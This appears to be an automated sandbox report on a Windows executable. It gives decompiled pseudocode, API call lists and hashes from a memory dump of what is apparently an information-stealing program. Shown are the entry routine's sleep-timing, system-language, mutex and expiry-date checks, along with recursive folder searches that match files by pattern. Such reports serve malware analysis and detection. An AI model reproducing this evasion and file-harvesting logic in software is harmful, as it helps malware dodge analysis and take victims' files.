Part of subcall function 004044A0: lstrcat.KERNEL32(?,00BAC128), ref: 0040461C

Part of subcall function 004066C0: getenv.MSVCRT ref: 004066D6
Part of subcall function 004066C0: _putenv.MSVCRT ref: 00406718
Part of subcall function 004066C0: LoadLibraryA.KERNEL32(00BAE358), ref: 0040673A
Part of subcall function 004066C0: GetProcAddress.KERNEL32(00000000,00BBBC60), ref: 0040675F
Part of subcall function 004066C0: GetProcAddress.KERNEL32(00000000,00BBBD50), ref: 00406778
Part of subcall function 004066C0: GetProcAddress.KERNEL32(00000000,00BB9590), ref: 00406790
Part of subcall function 004066C0: GetProcAddress.KERNEL32(00000000,00BBBDB0), ref: 004067A8
Part of subcall function 004066C0: GetProcAddress.KERNEL32(00000000,00BB9470), ref: 004067C1
Part of subcall function 004066C0: GetProcAddress.KERNEL32(00000000,00BBBC78), ref: 004067D9

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: lstrcat$AddressProc$AttributesFileFolderLibraryLoadPath_putenvgetenv
String ID:
API String ID: 2115538314-0
Opcode ID: d7b104966df0c4f587638c5d85ab0dd0a00a196f08126a6c0d9cc282a6dd5c8b
Instruction ID: f192608eb3bf5958fa4e1018c438b657ab8ff559e1ee80352892d12e9e290673
Opcode Fuzzy Hash: d7b104966df0c4f587638c5d85ab0dd0a00a196f08126a6c0d9cc282a6dd5c8b
Instruction Fuzzy Hash: 6D110FF684420897CB10EFA0DC85FEA333C6B54304F0449BDF51556191EAB9A6D8CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004057F0, Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				E004016E0(_t1); // executed
				E0040AF00(_t11); // executed
				_t4 = E00405740(); // executed
				_t12 = _t4;
				if(_t4 != 0) {
					_t5 = E00405780(_t12); // executed
					if(_t5 == 0) {
						_t6 = E004056B0(); // executed
						if(_t6 != 0) {
							_t7 = E004057C0(); // executed
							_t15 = _t7;
							if(_t7 != 0) {
								E004017B0(); // executed
								E0040B0B0(); // executed
								E00405590(_t11, _t15); // executed
								E00405330(); // executed
							}
						}
					}
				}
				ExitProcess(0);
			}

0x004057f3
0x004057f8
0x004057fd
0x00405802
0x00405804
0x00405806
0x0040580d
0x0040580f
0x00405816
0x00405818
0x0040581d
0x0040581f
0x00405821
0x00405826
0x0040582b
0x00405830
0x00405830
0x0040581f
0x00405816
0x0040580d
0x00405837

APIs

__cfltcvt_init.LIBCMTD ref: 004057F3

Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,004130B0), ref: 0040AF5C
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,004130C0), ref: 0040AF74
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,004130C8), ref: 0040AF8C
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,004130E0), ref: 0040AFA5
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,004130F0), ref: 0040AFBD
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,00413088), ref: 0040AFD5
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,00413100), ref: 0040AFEE
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,0041310C), ref: 0040B006
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,0041311C), ref: 0040B01E
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73B60000,00413130), ref: 0040B037
Part of subcall function 0040AF00: LoadLibraryA.KERNEL32(00413094,?,004057FD), ref: 0040B048
Part of subcall function 0040AF00: LoadLibraryA.KERNEL32(004130A4,?,004057FD), ref: 0040B05A
Part of subcall function 0040AF00: GetProcAddress.KERNEL32(73AE0000,00413140), ref: 0040B07B

Part of subcall function 00405740: GetTickCount.KERNEL32 ref: 00405746
Part of subcall function 00405740: Sleep.KERNEL32(00003A98), ref: 00405754
Part of subcall function 00405740: GetTickCount.KERNEL32 ref: 0040575A

ExitProcess.KERNEL32 ref: 00405837

Part of subcall function 004056B0: GetUserDefaultLangID.KERNEL32 ref: 004056BD

Part of subcall function 004057C0: CreateMutexA.KERNEL32(00000000,00000000,00413050,?,0040581D), ref: 004057CD
Part of subcall function 004057C0: GetLastError.KERNEL32(?,0040581D), ref: 004057D3

Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0940), ref: 0040B0CD
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0AD8), ref: 0040B0E5
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BAE438), ref: 0040B0FE
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0BF8), ref: 0040B116
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0BB0), ref: 0040B12E
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0BC8), ref: 0040B147
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0C58), ref: 0040B15F
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0B98), ref: 0040B177
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0C10), ref: 0040B190
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB0C40), ref: 0040B1A8
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB50F8), ref: 0040B1C0
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB50E0), ref: 0040B1D9
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB5098), ref: 0040B1F1
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB5068), ref: 0040B209
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BAE178), ref: 0040B222
Part of subcall function 0040B0B0: GetProcAddress.KERNEL32(73B60000,00BB5080), ref: 0040B23A

Part of subcall function 00405590: GetSystemTime.KERNEL32(?,?,00000104), ref: 00405611
Part of subcall function 00405590: lstrcat.KERNEL32(?,00BA3DD0), ref: 00405625
Part of subcall function 00405590: sscanf.NTDLL ref: 00405663
Part of subcall function 00405590: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00405677
Part of subcall function 00405590: SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00405688
Part of subcall function 00405590: ExitProcess.KERNEL32 ref: 004056A2

Part of subcall function 00405330: lstrcat.KERNEL32(?,00000000), ref: 00405399
Part of subcall function 00405330: lstrcat.KERNEL32(?,00BA2F10), ref: 004053AD
Part of subcall function 00405330: lstrcat.KERNEL32(?,00BA5250), ref: 004053C0
Part of subcall function 00405330: lstrcat.KERNEL32(?,00BAC128), ref: 004053D4
Part of subcall function 00405330: lstrcat.KERNEL32(?,00BA4E70), ref: 004053E8
Part of subcall function 00405330: lstrcat.KERNEL32(?,00000000), ref: 00405476

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressProc$lstrcat$Time$System$CountExitFileLibraryLoadProcessTick$CreateDefaultErrorLangLastMutexSleepUser__cfltcvt_initsscanf
String ID:
API String ID: 3617304120-0
Opcode ID: 698af12eb65e6bd4d4f1ab7f695f86a4bb2cf852dccffcf26ed007256c2b7c9d
Instruction ID: e6f84d8b38f64c84140f2b7461406a734f62f6637172f6d3bf7a49ecd16c9fae
Opcode Fuzzy Hash: 698af12eb65e6bd4d4f1ab7f695f86a4bb2cf852dccffcf26ed007256c2b7c9d
Instruction Fuzzy Hash: 46E09921204A4581E61033F3094AB1F22988E00388F88983FBE60B52D2EEBC84108C7F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1F0, Relevance: 3.0, APIs: 2, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A1F0(long _a4) {
				void* _t4;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
				return _t4;
			}

0x0040a200
0x0040a207

APIs

GetProcessHeap.KERNEL32(00000008,00403A57,?,0040A0ED,00403A57,?,?,00403A57,-00000001), ref: 0040A1F9
RtlAllocateHeap.NTDLL(00000000,?,0040A0ED), ref: 0040A200

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 41d0fbaa2c55277a517c4dbe200de756f7bfc03d4562bd632345d00175777a67
Instruction ID: 895dd2ad4a609262e3e6d1d69cee1f3d64649ad5f4a03a63d04a3dd1fb88b5c5
Opcode Fuzzy Hash: 41d0fbaa2c55277a517c4dbe200de756f7bfc03d4562bd632345d00175777a67
Instruction Fuzzy Hash: CFC09B71194308ABD6005BD8EC0DDDD377CEB48651F00C051B60DC6551CA71A5444765

Uniqueness

Uniqueness Score: -1.00%

Function 00411260, Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411260(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _t85;
				void* _t120;

				_v20 = __ecx;
				if( *((intOrPtr*)(_v20 + 0x48)) == 0) {
					_t85 = E0040A0E0(__ecx, 0x6afa8); // executed
					_t120 = _t120 + 4;
					_v16 = _t85;
					_t126 = _v16;
					if(_v16 == 0) {
						_v24 = 0;
					} else {
						_v24 = E004113C0(_v16, _t126);
					}
					 *((intOrPtr*)(_v20 + 0x48)) = _v24;
				}
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 0x6afa4)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 0xc)) = E00411070;
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 0x10)) = E004108D0;
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)))) = _v20;
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 4)) = 8;
				 *((char*)( *((intOrPtr*)(_v20 + 0x48)) + 8)) =  *((intOrPtr*)(_v20 + 0x6c));
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 0x6afa4)) = 0;
				 *((short*)( *((intOrPtr*)(_v20 + 0x48)) + 0xe7e)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 0x6af70)) = 0;
				E0040D9A0( *((intOrPtr*)(_v20 + 0x48)), _v20 + 0x94, 0x4000, 1);
				E0040BF40( *((intOrPtr*)(_v20 + 0x48)), _a4 + 0x2a);
				E0040DF60( *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 4)),  *((intOrPtr*)(_v20 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 4)), _a4 + 4);
				_v12 = E0040EA30( *((intOrPtr*)(_v20 + 0x48)));
				 *((intOrPtr*)(_v20 + 0x90)) = _v12;
				_v8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x48)) + 0x6afa4)) != 0) {
					_v8 = 0x5000000;
				}
				return _v8;
			}

0x00411266
0x00411270
0x00411277
0x0041127c
0x0041127f
0x00411282
0x00411286
0x00411295
0x00411288
0x00411290
0x00411290
0x004112a2
0x004112a2
0x004112ab
0x004112bb
0x004112c8
0x004112d8
0x004112e0
0x004112f3
0x004112fc
0x0041130e
0x0041131b
0x0041133d
0x00411353
0x00411373
0x0041138a
0x00411393
0x00411399
0x004113ad
0x004113af
0x004113af
0x004113bc

APIs

new[].LIBCMTD ref: 00411277

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: new[]
String ID:
API String ID: 4059295235-0
Opcode ID: c862de4d39db79ec2dfec844d0f8228b64f868f6f597890246a85b12ce94bcca
Instruction ID: f507e5a858ef7f1a021494a64daf0129948dbe68583728240a3adb4fdd078fb9
Opcode Fuzzy Hash: c862de4d39db79ec2dfec844d0f8228b64f868f6f597890246a85b12ce94bcca
Instruction Fuzzy Hash: B5413DB8A00209CFCB04DF98D894BAEB7B1FF48304F1045A8EA156B352D736AD81CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A350, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A350(void* __ecx, intOrPtr _a4, signed int _a8) {
				void* _t6;

				E0040A230(__ecx, _a4, 0, 4);
				_t6 =  *0x4179d4(0, _a8 | 0x00008000, 0, 0, _a4); // executed
				if(_t6 < 0) {
					return 0;
				}
				return 1;
			}

0x0040a35b
0x0040a374
0x0040a37c
0x00000000
0x0040a382
0x00000000

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000000,00000004,?,004090E6,?,0000001C,?,00000104), ref: 0040A374

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e31f38484258ad07c5830489b7c43bf48450ecdbf203345d36cfc4f69f3b10d0
Instruction ID: f41b54169e152afa5d3b0d4ccd40072c5a54e675e33d04c64a93445645a9857b
Opcode Fuzzy Hash: e31f38484258ad07c5830489b7c43bf48450ecdbf203345d36cfc4f69f3b10d0
Instruction Fuzzy Hash: 70E0EC7138430477FB109A91CC06FE73758AB81B54F10C069BA085E2C0C5B5E91147AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C0, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A6C0(CHAR* _a4) {
				signed int _v8;
				intOrPtr _v12;
				long _t9;

				_t9 = GetFileAttributesA(_a4); // executed
				_v8 = _t9;
				if(_v8 == 0xffffffff || (_v8 & 0x00000010) != 0) {
					_v12 = 0;
				} else {
					_v12 = 1;
				}
				return _v12;
			}

0x0040a6ca
0x0040a6d0
0x0040a6d7
0x0040a6ea
0x0040a6e1
0x0040a6e1
0x0040a6e1
0x0040a6f7

APIs

GetFileAttributesA.KERNEL32(?,?,?,0040913F,?), ref: 0040A6CA

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fb304e5d40bdd88b5918f7fe22583f01ec0ec17112e95f125d91ae00e7db7b86
Instruction ID: ae41cc3eaf4959377263261a711f5e1658810a78c60131bf7c1c351c64ca6ecb
Opcode Fuzzy Hash: fb304e5d40bdd88b5918f7fe22583f01ec0ec17112e95f125d91ae00e7db7b86
Instruction Fuzzy Hash: D0E08670C0430CEBDB00DFD8C56869DBB74EB01321F1486A5D8456B3C0D3355AA5DB46

Uniqueness

Uniqueness Score: -1.00%

Function 00405F10, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F10() {
				struct HINSTANCE__* _t1;
				int _t2;

				_t1 =  *0x41781c; // 0x60900000
				_t2 = FreeLibrary(_t1); // executed
				return _t2;
			}

0x00405f13
0x00405f19
0x00405f20

APIs

FreeLibrary.KERNEL32(60900000,?,00409752,00417828,00000004), ref: 00405F19

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: dc5a4f34d7f0755b9bcb0a0be6ebddfdf22867ffc07c879b6b1fb9f05127cfe6
Instruction ID: 3adbb4e9713a5ecd6c9f09427c6f9860e0036743130cf546859c8c4b7e44dc6b
Opcode Fuzzy Hash: dc5a4f34d7f0755b9bcb0a0be6ebddfdf22867ffc07c879b6b1fb9f05127cfe6
Instruction Fuzzy Hash: D9B012310083088B850067D8BC0C88633FC9608640300C470B10C83511C720B4108658

Uniqueness

Uniqueness Score: -1.00%

Function 00401170, Relevance: 1.3, APIs: 1, Instructions: 41
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401170(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v268;
				void* _t19;
				void* _t21;

				_t21 = __ecx;
				E0040A270( &_v268, 0x104);
				if(_a4 == 0) {
					E0040A350(_t21,  &_v268, 0x1a); // executed
				} else {
					E0040A350( &_v268,  &_v268, 0x1c); // executed
				}
				 *0x4179f8( &_v268, _a12);
				_t19 = E00401000(0x413042,  &_v268, _a16, _a12, _a8, _a20); // executed
				return _t19;
			}

0x00401170
0x00401185
0x0040118e
0x004011ac
0x00401190
0x00401199
0x0040119e
0x004011bf
0x004011e1
0x004011ec

APIs

lstrcat.KERNEL32(?,00BB0B38), ref: 004011BF

Part of subcall function 0040A350: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000000,00000004,?,004090E6,?,0000001C,?,00000104), ref: 0040A374

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: FolderPathlstrcat
String ID:
API String ID: 1210066190-0
Opcode ID: 370cc8fbfd7e5c3f24e948ae542504a91b937d35a52ceb744549276b830cf946
Instruction ID: 58975180ac89824097b8fcb33d087c8b37ae753370b452df76ceeaf500f147f8
Opcode Fuzzy Hash: 370cc8fbfd7e5c3f24e948ae542504a91b937d35a52ceb744549276b830cf946
Instruction Fuzzy Hash: 5D01FEB65042086BC714EF54DC42FDA337C5B18304F04419EBE88661C1DA79D6D48B96

Uniqueness

Uniqueness Score: -1.00%

Function 0040A650, Relevance: 1.3, APIs: 1, Instructions: 35
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A650(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _t20;

				_v12 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = LocalAlloc(0x40, _a8 + 1); // executed
					_v12 = _t20;
					if(_v12 != 0) {
						_v8 = 0;
						while(_v8 < _a8) {
							 *((char*)(_v12 + _v8)) =  *((intOrPtr*)(_a4 + _v8));
							_v8 = _v8 + 1;
						}
					}
				}
				return _v12;
			}

0x0040a656
0x0040a661
0x0040a672
0x0040a678
0x0040a67f
0x0040a681
0x0040a693
0x0040a6a9
0x0040a690
0x0040a690
0x0040a693
0x0040a67f
0x0040a6b3

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 0040A672

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 6981d3c1a74b7958306937cae3159ff023b8dd937b44764dffa80fe8afb94bf3
Instruction ID: d0b2340483726feef73ed71510afc1728c416c5ae3e5833af6577c6ec741f23c
Opcode Fuzzy Hash: 6981d3c1a74b7958306937cae3159ff023b8dd937b44764dffa80fe8afb94bf3
Instruction Fuzzy Hash: 4A01FB30904208EBDB05CF98C5857AD7BB5EF44308F2884A9D9466B391C3795EA4DF4A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00408650, Relevance: 35.1, APIs: 19, Strings: 1, Instructions: 121fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00408669
FindFirstFileA.KERNEL32(?,?), ref: 00408680
StrCmpCA.SHLWAPI(?,00413038), ref: 004086A6
StrCmpCA.SHLWAPI(?,0041303C), ref: 004086BC
FindNextFileA.KERNEL32(000000FF,?), ref: 00408800
FindClose.KERNEL32(000000FF), ref: 00408815

Strings

%s\*, xrefs: 0040865D

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*
API String ID: 180737720-766152087
Opcode ID: 2bc612c5133acc66f617bff4817886b23eb8f66f318fbb654ddbad4ba77e1011
Instruction ID: af29c09d61fd7681b43eb64fba39c43c0f40861128cb0c7075e02eab727cfc33
Opcode Fuzzy Hash: 2bc612c5133acc66f617bff4817886b23eb8f66f318fbb654ddbad4ba77e1011
Instruction Fuzzy Hash: 434166F2914219ABCB10DFA0DC48EEB777CBB48701F04869DB605A6150EB759BC8CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00408410, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00408410(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				void* _t59;
				signed int _t60;
				int _t62;
				signed int _t64;
				intOrPtr _t67;
				signed int _t71;
				intOrPtr _t72;
				intOrPtr _t100;
				intOrPtr _t119;
				void* _t134;
				void* _t135;

				_push(_a8);
				wsprintfA( &_v268, "%s\*");
				_t135 = _t134 + 0xc;
				_t59 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t59;
				if(_v272 != 0xffffffff) {
					goto L2;
				} else {
					return _t59;
				}
				do {
					L2:
					_t60 =  *0x417a20( &(_v596.cFileName), 0x413038);
					__eflags = _t60;
					if(_t60 == 0) {
						L4:
						goto L15;
					}
					_t64 =  *0x417a20( &(_v596.cFileName), 0x41303c);
					__eflags = _t64;
					if(_t64 != 0) {
						wsprintfA( &_v860, "%s\%s");
						_t135 = _t135 + 0x10;
						_t67 =  *0x4174c4; // 0xbbbb10
						__eflags =  *0x417a20( &(_v596.cFileName), _t67, _a8,  &(_v596.cFileName));
						if(__eflags != 0) {
							_t100 =  *0x417030; // 0xbb92f0
							__eflags =  *0x417a20( &(_v596.cFileName), _t100);
							if(__eflags != 0) {
								_t119 =  *0x4177d4; // 0xbbbd80
								_t71 =  *0x417a20( &(_v596.cFileName), _t119);
								__eflags = _t71;
								if(_t71 != 0) {
									_t72 =  *0x4170d4; // 0xbbbb28
									__eflags =  *0x417a20( &(_v596.cFileName), _t72);
									if(__eflags != 0) {
										__eflags = _v596.dwFileAttributes & 0x00000010;
										if((_v596.dwFileAttributes & 0x00000010) != 0) {
											_t50 =  &_a12; // 0x413042
											E00408410( &(_v596.cFileName),  &_v860,  *_t50, _a16);
											_t135 = _t135 + 0x10;
										}
									} else {
										_t41 =  &_a12; // 0x413042
										E004082C0(_a4, __eflags,  &_v860, _a4,  *_t41, _a16);
										_t45 =  &_a12; // 0x413042
										E00408410( &(_v596.cFileName),  &_v860,  *_t45, _a16);
										_t135 = _t135 + 0x20;
									}
								} else {
									_push(_a16);
									_t33 =  &_a12; // 0x413042
									E00407D90(_a4, _a4,  *_t33, _a8);
									_t36 =  &_a12; // 0x413042
									E00408410( &(_v596.cFileName),  &_v860,  *_t36, _a16);
									_t135 = _t135 + 0x20;
								}
							} else {
								_t23 =  &_a12; // 0x413042
								E00408130( *_t23, __eflags,  &_v860, _a4,  *_t23, _a16);
								_t27 =  &_a12; // 0x413042
								E00408410( &(_v596.cFileName),  &_v860,  *_t27, _a16);
								_t135 = _t135 + 0x20;
							}
						} else {
							_t14 =  &_a12; // 0x413042
							E00407930(_a4, __eflags,  &_v860, _a4,  *_t14, _a16);
							_t18 =  &_a12; // 0x413042
							E00408410( &(_v596.cFileName),  &_v860,  *_t18, _a16);
							_t135 = _t135 + 0x20;
						}
						goto L15;
					}
					goto L4;
					L15:
					_t62 = FindNextFileA(_v272,  &_v596);
					__eflags = _t62;
				} while (_t62 != 0);
				return FindClose(_v272);
			}

0x0040841c
0x00408429
0x0040842f
0x00408440
0x00408446
0x00408453
0x00000000
0x00000000
0x00000000
0x00000000
0x0040845a
0x0040845a
0x00408466
0x0040846c
0x0040846e
0x00408486
0x00000000
0x00408486
0x0040847c
0x00408482
0x00408484
0x004084a2
0x004084a8
0x004084ab
0x004084be
0x004084c0
0x00408500
0x00408514
0x00408516
0x00408556
0x00408564
0x0040856a
0x0040856c
0x004085a6
0x004085b9
0x004085bb
0x004085fe
0x00408601
0x00408607
0x00408619
0x0040861e
0x0040861e
0x004085bd
0x004085c1
0x004085d0
0x004085dc
0x004085ee
0x004085f3
0x004085f3
0x0040856e
0x00408571
0x00408576
0x0040857e
0x0040858a
0x0040859c
0x004085a1
0x004085a1
0x00408518
0x0040851c
0x0040852b
0x00408537
0x00408549
0x0040854e
0x0040854e
0x004084c2
0x004084c6
0x004084d5
0x004084e1
0x004084f3
0x004084f8
0x004084f8
0x00000000
0x004084c0
0x00000000
0x00408621
0x0040862f
0x00408635
0x00408635
0x00000000

APIs

wsprintfA.USER32 ref: 00408429
FindFirstFileA.KERNEL32(?,?), ref: 00408440
StrCmpCA.SHLWAPI(?,00413038), ref: 00408466
StrCmpCA.SHLWAPI(?,0041303C), ref: 0040847C
FindNextFileA.KERNEL32(000000FF,?), ref: 0040862F
FindClose.KERNEL32(000000FF), ref: 00408644

Strings

B0A, xrefs: 00408607, 004085C1, 004085DC, 00408576, 0040858A, 0040851C, 00408537, 004084C6, 004084E1, 004084C9, 004084E4, 0040851F, 0040853A, 00408579, 0040858D, 004085C4, 004085DF, 0040860A
%s\%s, xrefs: 00408496
%s\*, xrefs: 0040841D

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*$B0A
API String ID: 180737720-2372131211
Opcode ID: e9cccd353f8c0fd38fc5b97d35abc647dca4730cc43c47d7b0d7722d1220f83b
Instruction ID: 8b5ad09f5b22ed0b7d0c9af81bc90615e0cb40dec272bd18c8661e881babfc0e
Opcode Fuzzy Hash: e9cccd353f8c0fd38fc5b97d35abc647dca4730cc43c47d7b0d7722d1220f83b
Instruction Fuzzy Hash: 016173B2900619ABCB14DF94DD84DEB33BDAF4C700F0489ADB619A3141EA34EB548F65

Uniqueness

Uniqueness Score: -1.00%

Function 00404DD0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 108
fileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404DD0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, intOrPtr _a24) {
				char _v268;
				void* _v272;
				struct _WIN32_FIND_DATAA _v596;
				char _v860;
				char _v1124;
				void* _t36;
				void* _t75;
				void* _t76;
				void* _t77;

				_push(_a12);
				wsprintfA( &_v268, "%s\*");
				_t76 = _t75 + 0xc;
				_t36 = FindFirstFileA( &_v268,  &_v596);
				_v272 = _t36;
				if(_v272 != 0xffffffff) {
					do {
						_push(0x413038);
						_push( &(_v596.cFileName));
						if( *0x417a20() == 0) {
							L4:
							goto L12;
						}
						_push(0x41303c);
						_push( &(_v596.cFileName));
						if( *0x417a20() != 0) {
							_push( &(_v596.cFileName));
							_push(_a12);
							wsprintfA( &_v1124, "%s\%s");
							_t77 = _t76 + 0x10;
							_push(0x413042);
							_push(_a8);
							if( *0x417a20() != 0) {
								_push( &(_v596.cFileName));
								_push(_a8);
								wsprintfA( &_v860, "%s\%s");
								_t76 = _t77 + 0x10;
							} else {
								wsprintfA( &_v860, 0x41304c,  &(_v596.cFileName));
								_t76 = _t77 + 0xc;
							}
							_t18 =  &_a16; // 0x413042
							if(PathMatchSpecA( &(_v596.cFileName),  *_t18) != 0) {
								E00412360(_a4,  &_v860,  &_v1124);
								_t76 = _t76 + 0xc;
							}
							if(_a20 != 0) {
								_t26 =  &_a16; // 0x413042
								E00404DD0(_a4,  &_v860,  &_v1124,  *_t26, _a20, _a24);
								_t76 = _t76 + 0x18;
							}
							goto L12;
						}
						goto L4;
						L12:
					} while (FindNextFileA(_v272,  &_v596) != 0);
					return FindClose(_v272);
				}
				return _t36;
			}

0x00404ddc
0x00404de9
0x00404def
0x00404e00
0x00404e06
0x00404e13
0x00404e1a
0x00404e1a
0x00404e25
0x00404e2e
0x00404e46
0x00000000
0x00404e46
0x00404e30
0x00404e3b
0x00404e44
0x00404e51
0x00404e55
0x00404e62
0x00404e68
0x00404e6b
0x00404e73
0x00404e7c
0x00404ea2
0x00404ea6
0x00404eb3
0x00404eb9
0x00404e7e
0x00404e91
0x00404e97
0x00404e97
0x00404ebc
0x00404ecf
0x00404ee3
0x00404ee8
0x00404ee8
0x00404eef
0x00404ef9
0x00404f0f
0x00404f14
0x00404f14
0x00000000
0x00404eef
0x00000000
0x00404f17
0x00404f2b
0x00000000
0x00404f3a
0x00000000

APIs

wsprintfA.USER32 ref: 00404DE9
FindFirstFileA.KERNEL32(?,?), ref: 00404E00
StrCmpCA.SHLWAPI(?,00413038), ref: 00404E26
StrCmpCA.SHLWAPI(?,0041303C), ref: 00404E3C
FindNextFileA.KERNEL32(000000FF,?), ref: 00404F25
FindClose.KERNEL32(000000FF), ref: 00404F3A

Strings

%s\%s, xrefs: 00404E56, 00404EA7
%s\*, xrefs: 00404DDD
B0A, xrefs: 00404EBC, 00404EF9, 00404EBF, 00404EFC

Memory Dump Source

Source File: 00000002.00000002.683914900.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\*$B0A
API String ID: 180737720-2372131211
Opcode ID: 449887c1d3c8a9caf8a2e502b927a4b8bc71fb38d435b07fccc8b952fb49c7e0
